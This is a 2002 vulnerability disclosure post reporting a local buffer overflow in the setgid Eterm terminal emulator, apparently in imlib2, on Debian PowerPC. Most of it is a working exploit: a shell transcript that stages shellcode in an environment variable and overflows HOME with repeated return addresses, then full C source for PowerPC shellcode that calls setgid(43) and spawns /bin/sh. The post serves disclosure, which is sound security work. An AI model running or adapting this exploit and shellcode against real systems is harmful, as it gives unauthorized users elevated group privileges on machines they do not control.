Eterm SGID utmp Buffer Overflow (Local)

From: Charles 'core' Stevenson (coreat_private)
Date: Sun Jan 13 2002 - 06:57:57 PST


    I found this last night looking for suids to overflow.  Tested on Debian
    PowerPC Unstable. Yields gid utmp, from which higher privileges could be
    gained with a little effort. I haven't looked too closely, but I think the
    overflow might be in imlib2.
    
    [-(core@euclid:/home/core/tmp)> gcc execve.c -o execve
    [-(core@euclid:/home/core/tmp)> export EGG=`./execve`
    sizeof(shellcode)=73
    [-(core@euclid:/home/core/tmp)> ./getenv EGG
    Shellcode @ 0x7fffff95                      
    [-(core@euclid:/home/core/tmp)> export HOME=`perl -e 'print
    "\x7f\xff\xff\x96"x1032'`
    [-(core@euclid:/home/core/tmp)> Eterm
    sh-2.05a$ id                         
    uid=1000(core) gid=1000(core) egid=43(utmp) groups=1000(core)
    
    ii  eterm          0.9.1-2        Enlightened Terminal Emulator
    ii  libimlib2      1.0.4-1        Powerful image loading and rendering library
    
    /* execve.c
     *
     * PowerPC Linux Shellcode
     *
     * by Charles Stevenson <coreat_private>
     * 
     * original execve by my good friend 
     * Kevin Finisterre  <dotslashat_private>
     */
    
    #include <stdio.h>
    
    /* Payload bytes exactly as posted; the trailing comments are the
     * author's own disassembly, rejoined here after mail-client wrapping.
     * 18 four-byte words plus the array's implicit NUL terminator give
     * the sizeof(shellcode)=73 shown in the transcript above. */
    char shellcode[] =
    /* setgid(43) utmp */
            "\x38\x60\x01\x37"              /* 100004a0: li     r3,311          */
            "\x38\x63\xfe\xf4"              /* 100004a4: addi   r3,r3,-268      */
            "\x3b\xc0\x01\x70"              /* 100004a8: li     r30,368         */
            "\x7f\xc0\x1e\x70"              /* 100004ac: srawi  r0,r30,3        */
            "\x44\xff\xff\x02"              /* 100004b0: sc                     */
    /* execve("/bin/sh") */
            "\x7c\xa5\x2a\x78"              /* 100004b0: xor    r5,r5,r5        */
            "\x40\x82\xff\xed"              /* 100004b4: bnel+  100004a0 <main> */
            "\x7f\xe8\x02\xa6"              /* 100004b8: mflr   r31             */
            "\x3b\xff\x01\x30"              /* 100004bc: addi   r31,r31,304     */
            "\x38\x7f\xfe\xf4"              /* 100004c0: addi   r3,r31,-268     */
            "\x90\x61\xff\xf8"              /* 100004c4: stw    r3,-8(r1)       */
            "\x90\xa1\xff\xfc"              /* 100004c8: stw    r5,-4(r1)       */
            "\x38\x81\xff\xf8"              /* 100004cc: addi   r4,r1,-8        */
            "\x3b\xc0\x01\x60"              /* 100004d0: li     r30,352         */
            "\x7f\xc0\x2e\x70"              /* 100004d4: srawi  r0,r30,5        */
            "\x44\xff\xff\x02"              /* 100004d8: sc                     */
            "\x2f\x62\x69\x6e"              /* 100004dc: cmpdi  cr6,r2,26990    */
            "\x2f\x73\x68\x00";             /* 100004e0: cmpdi  cr6,r19,26624   */
    
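    /* Writes the shellcode array to stdout; the size diagnostic goes to
     * stderr so it does not mix with the captured stdout.  sizeof() yields
     * size_t, so it is printed with %zu -- the original's %d is a
     * mismatched conversion specifier (undefined behaviour, -Wformat warns).
     * argc/argv are unused and explicitly voided to keep -Wextra quiet. */
    int main(int argc, char **argv) {
       (void)argc;
       (void)argv;
       fprintf(stderr, "sizeof(shellcode)=%zu\n", sizeof(shellcode));
       printf("%s", shellcode);
       return 0;
    }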
    
    Best Regards,
    Charles 'core' Stevenson
    


